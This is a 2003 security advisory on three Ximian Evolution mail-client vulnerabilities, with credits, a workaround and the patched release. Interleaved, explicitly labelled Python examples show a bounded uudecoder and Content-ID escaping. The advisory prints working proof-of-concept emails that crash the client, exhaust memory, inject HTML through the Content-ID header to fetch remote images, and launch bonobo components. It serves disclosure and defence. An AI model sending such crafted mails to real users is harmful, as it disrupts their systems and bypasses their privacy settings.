20th Mar 2003 [SBWID-6077]
COMMAND
Ximian's Evolution: multiple vulnerabilities
SYSTEMS AFFECTED
Evolution 1.2.2 and prior releases are vulnerable, partially or wholly,
to the vulnerabilities in this advisory.
PROBLEM
In Core Security Technologies Advisory [CORE-20030304-01] :
http://www.coresecurity.com/common/showdoc.php?idx=309&idxseccion=10
*Credits:*
==========
These vulnerabilities were found by Diego Kelyacoubian, Javier Kohen,
Alberto Solino, and Juan Vera from Core Security Technologies during
Bugweek 2003 (March 3-7, 2003).
We would like to thank Carlos Montero Luque at Ximian for quickly
addressing our report and coordinating the generation and public
release of patches and information regarding these vulnerabilities.
Thanks also to Jeffrey Stedfast and other members of the Evolution
development team for the followup and development of the patches to
close these vulnerabilities.
*Vulnerability Description:*
============================
Ximian Evolution is a personal and workgroup information management
solution for Linux and UNIX-based systems. The software integrates
email, calendaring, meeting scheduling, contact management, and task
lists, in one application. For more information about Ximian Evolution
visit http://www.ximian.com
Three vulnerabilities were found that could lead to various forms of
exploitation, ranging from denying users the ability to read email and
provoking system instability to bypassing security context checks for
email content and possibly executing arbitrary commands on vulnerable
systems.
The following security vulnerabilities were found:
[CAN-2003-0128, BID 7117]
The Evolution mailer accepts UUEncoded content and will transparently
decode it. By including a specially crafted UUE header as part of an
otherwise perfectly normal email an attacker has the ability to crash
Evolution as soon as the mail is parsed. This makes it particularly
difficult to delete this email from Evolution's GUI and prevents a user
from reading email until the malicious mail is removed from the
mailbox.
All versions of Evolution that include the function try_uudecoding in
the module mail/mail-format.c are vulnerable.
[CAN-2003-0129, BID 7118]
Having the Evolution mailer process mail content UUencoded multiple
times will cause resource starvation. The MUA will try to allocate
memory until it dies, possibly leading to system instability. Our
example in the technical details section uses email content encoded 3
times.
[CAN-2003-0130, BID 7119]
By including a specially crafted MIME Content-ID header as part of an
image/* MIME part, it is possible to include arbitrary data, including
HTML tags, into the stream that is passed to GTKHtml for rendering.
These vulnerabilities provide multiple exploitation possibilities in
the Evolution mailer. Namely, it is possible:
a) To crash the application. The crash appears to be the result
of heap corruption; further research on this bug is required
to demonstrate successful exploitation to run arbitrary commands
on vulnerable systems.
b) To bypass the "Don't connect to remote hosts to fetch images"
option.
c) To execute some bonobo components and pass them arbitrary content,
included as part of the mail.
*Technical Description - Exploit/Concept Code:*
===============================================
[CAN-2003-0128, BID 7117]
The following email will reproduce this vulnerability, note that
an empty line is required before and after the UUE header line.
>From [email protected] Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <[email protected]>
To: [email protected]
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=name
Content-Type: application/octet-stream; name=name
Content-Transfer-Encoding: 7bit
begin 600
end
--=-mTDu5zdJIsixETTwCF5Y--
[CAN-2003-0129, BID 7118]
The following email will reproduce this vulnerability.
>From [email protected] Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <[email protected]>
To: [email protected]
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=name
Content-Type: application/octet-stream; name=name
Content-Transfer-Encoding: 7bit
begin 600 phase2
M8F5G:6X@-C P('!H87-E,0I-.$8U1SHV6$ M0R!0*"<Q13XG,"HS,RA&+310
M6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-"*2 R,D19"DTP0B4Y+E4\5# C
M138W-3!(*5,E+RHB/%$R(TA7*R0@7"E%52DN5#Q0,T!)+2I4*$$V,TTW+20\
M7#%#,2 *32\D.%4P,T1',20@72E%42 O,SQ-,3) 1"LR7%0Q(S$@+$,Q-2PC
M(%0K,S!(+$(Q(2A$(2DQ4TTR*#1 6 I-+4)5*R)$-$@I5#4O+S,\23131%8T
M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A-
?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@
end
--=-mTDu5zdJIsixETTwCF5Y--
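The two payloads above share one root cause: the decoder trusts the "begin" header and keeps decoding whatever comes out of it. The Python below is an added illustration, not Evolution's code; it does not reproduce try_uudecoding() and makes no claim about that function's internals. It shows a uudecoder that rejects a "begin" line carrying no filename (the CAN-2003-0128 trigger) and that caps both nesting depth and decoded size instead of allocating until it dies (the CAN-2003-0129 trigger). The three-layer test payload is constructed with the block's own encoder rather than copied from the advisory.

```python
"""Strict uudecode for mail bodies, illustrating CAN-2003-0128 and
CAN-2003-0129.  Added example; not Evolution's try_uudecoding()."""
import binascii
import re

# "begin <octal mode> <filename>": the filename is mandatory and the whole
# line must match, so a bare "begin 600" is rejected instead of indexed past.
_BEGIN_RE = re.compile(r'^begin ([0-7]{3,4}) (\S.*)$')


class UUDecodeError(ValueError):
    """Raised for any malformed, oversized or too deeply nested payload."""


def parse_begin_line(line):
    """Return (mode, filename) from a uuencode header, or raise UUDecodeError."""
    m = _BEGIN_RE.match(line.rstrip('\r\n'))
    if m is None:
        raise UUDecodeError('malformed uuencode header: %r' % line)
    return int(m.group(1), 8), m.group(2)


def uuencode(name, data, mode=0o600):
    """Encoder used only to build test input; 45 input bytes per line."""
    lines = ['begin %o %s' % (mode, name)]
    for i in range(0, len(data), 45):
        lines.append(binascii.b2a_uu(data[i:i + 45]).decode('ascii').rstrip('\n'))
    lines += ['`', 'end']
    return '\n'.join(lines) + '\n'


def uudecode(text, max_output=1 << 20):
    """Decode the first uuencoded blob in text; return (filename, data)."""
    lines = text.splitlines()
    for start, line in enumerate(lines):
        if line.startswith('begin '):
            break
    else:
        raise UUDecodeError('no begin line')
    _mode, name = parse_begin_line(lines[start])
    out = bytearray()
    for line in lines[start + 1:]:
        if not line.strip():          # blank line: nothing to decode
            continue
        if line.strip() == 'end':
            return name, bytes(out)
        try:
            out += binascii.a2b_uu(line)
        except binascii.Error as exc:
            raise UUDecodeError('bad uuencode line %r: %s' % (line, exc))
        if len(out) > max_output:   # bound memory before the next line
            raise UUDecodeError('decoded payload exceeds %d bytes' % max_output)
    raise UUDecodeError('missing end line')


def uudecode_nested(text, max_depth=2, max_output=1 << 20):
    """Peel uuencode layers while the output is itself uuencoded, but never
    more than max_depth times.  Returns (layers, filename, data)."""
    name, data = uudecode(text, max_output)
    depth = 1
    while data.lstrip().startswith(b'begin '):
        if depth >= max_depth:
            raise UUDecodeError('more than %d uuencode layers' % max_depth)
        name, data = uudecode(data.decode('latin-1'), max_output)
        depth += 1
    return depth, name, data


def decode_or_none(text, max_depth=2):
    """Convenience wrapper: the result tuple, or None if the mail is rejected."""
    try:
        return uudecode_nested(text, max_depth)
    except UUDecodeError:
        return None


# Constructed test input, not the advisory's payload: three layers, as in the
# CAN-2003-0129 proof of concept.
INNER = b'hello, world. ' * 5
TRIPLE = uuencode('phase3', uuencode('phase2', uuencode('phase1', INNER).encode()).encode())
# The CAN-2003-0128 trigger: a header with a mode but no filename.
BARE_BEGIN = '\nbegin 600\nend\n'

if __name__ == '__main__':
    print(decode_or_none(TRIPLE, max_depth=3))   # peels all three layers
    print(decode_or_none(TRIPLE, max_depth=2))   # None: nesting cap reached
    print(decode_or_none(BARE_BEGIN))            # None: rejected, not crashed
```

The depth cap of two layers and the 1 MiB ceiling are policy choices, not values taken from Evolution; under the defaults the three-layer payload is rejected, and it decodes only when the caller explicitly allows max_depth=3.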
[CAN-2003-0130, BID 7119]
The handle_image() function, located in the module
mail/mail-format.c, lacks proper input checking: it does not escape
HTML characters in the string returned by get_cid, which is in turn
constructed from the Content-ID MIME header of the MIME part.
It can be exploited several ways, for instance:
a) The Evolution mailer will crash when a MIME part's Content-ID is
referenced from two different object tags via the cid "protocol".
The following email will reproduce this vulnerability in Evolution
version 1.2.1:
>From [email protected] Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <[email protected]>
To: [email protected]
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300
--=-mTDu5zdJIsixETTwCF5Y
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Content-Id: hello
Hello World!
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name1.gif
Content-Type: image/gif; name=name1.gif
Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "
Content-Transfer-Encoding: base64
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "
Content-Transfer-Encoding: base64
--=-mTDu5zdJIsixETTwCF5Y
b) The following email bypasses the "Don't connect to remote hosts
to fetch images" option.
>From [email protected] Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <[email protected]>
To: [email protected]
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300
--=-mTDu5zdJIsixETTwCF5Y
Content-Type: text/html
Content-Transfer-Encoding: 7bit
Content-Id: apart
<img src="http://external.host.com:anyport">
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:apart" type="text/html"></OBJECT><hr "
Content-Transfer-Encoding: base64
--=-mTDu5zdJIsixETTwCF5Y
c) It is possible to execute bonobo components to handle content
types that the Evolution mailer does not handle internally (for
example audio/ulaw). The following mail uses the Content-ID bug to
execute the bonobo-audio-ulaw component (bundled by default with
bonobo) and pass it arbitrary content.
>From [email protected] Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <[email protected]>
To: [email protected]
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300
--=-mTDu5zdJIsixETTwCF5Y
Content-Type: audio/ulaw
Content-Transfer-Encoding: 7bit
Content-Id: mysong
There she was, just walking down the street...
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:mysong" type="audio/ulaw"></OBJECT><hr "
Content-Transfer-Encoding: base64
--=-mTDu5zdJIsixETTwCF5Y
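All three variants above ride on the same defect: the Content-ID string reaches the HTML stream unescaped, so a leading `">` closes the attribute and the tag and whatever follows is rendered as markup. The Python below is an added example, not Evolution's handle_image()/get_cid or GtkHTML code. It puts the vulnerable interpolation next to an escaped version and adds a scanner that parses a message modelled on proof of concept (b) (constructed here, with example.invalid addresses) and flags any part whose Content-ID is not a well-formed RFC 2045 msg-id.

```python
"""Content-ID injection (CAN-2003-0130): unescaped vs. escaped rendering,
plus a scanner for MIME parts whose Content-ID is not a msg-id.
Added example; not Evolution's handle_image()/get_cid."""
import email
import html
import re

# RFC 2045: Content-ID = "<" addr-spec ">".  Deliberately strict approximation:
# one local part, one "@", one domain, no whitespace, quotes or angle brackets.
_MSG_ID_RE = re.compile(r'^<[^<>"\s@]+@[^<>"\s@]+>$')


def content_id_is_wellformed(cid):
    return bool(_MSG_ID_RE.match(cid.strip()))


def render_image_vulnerable(cid):
    # Attacker-controlled string interpolated straight into the HTML stream.
    return '<img src="cid:%s">' % cid


def render_image_hardened(cid):
    # quote=True turns " < > & into entities, so the value cannot leave the
    # src attribute no matter what the header contains.
    return '<img src="cid:%s">' % html.escape(cid, quote=True)


def scan_message(raw_mail):
    """Return (content_type, content_id) for every part whose Content-ID
    would reach the renderer without being a well-formed msg-id."""
    msg = email.message_from_string(raw_mail)
    flagged = []
    for part in msg.walk():
        cid = part.get('Content-Id')
        if cid is not None and not content_id_is_wellformed(cid):
            flagged.append((part.get_content_type(), cid.strip()))
    return flagged


# Constructed sample modelled on proof of concept (b); not a captured mail.
SAMPLE = """\
Subject: xxx
From: X X. X <sender@example.invalid>
To: victim@example.invalid
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Mime-Version: 1.0

--=-mTDu5zdJIsixETTwCF5Y
Content-Type: text/html
Content-Transfer-Encoding: 7bit
Content-Id: <apart@example.invalid>

<img src="http://external.host.com:anyport">
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:apart@example.invalid" type="text/html"></OBJECT><hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y--
"""

if __name__ == '__main__':
    for ctype, cid in scan_message(SAMPLE):
        print('%s part with suspicious Content-ID: %r' % (ctype, cid))
        print('  unescaped:', render_image_vulnerable(cid))
        print('  escaped:  ', render_image_hardened(cid))
```

Escaping is the fix for the rendering path; the syntactic check is a separate, stricter filter that a mail gateway can apply up front, since a legitimate Content-ID never contains quotes or angle brackets inside the msg-id.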
SOLUTION
Ximian is providing Evolution 1.2.3 on [March 18/March 19]. This
release resolves all vulnerabilities in this advisory as well as other
unrelated bugs. The patched code for Evolution that resolves these
vulnerabilities is also already available in GNOME CVS.
A workaround for unpatched versions of Evolution to prevent Evolution
from crashing when viewing messages that exploit these vulnerabilities
is to go into "View"->"Message Display" and change the value to "Show
E-mail Source."
Distribution vendors who provide their own version of Evolution have
been advised of these issues as well as having been provided the
patches to fix them. They may provide updated packages for their
distributions.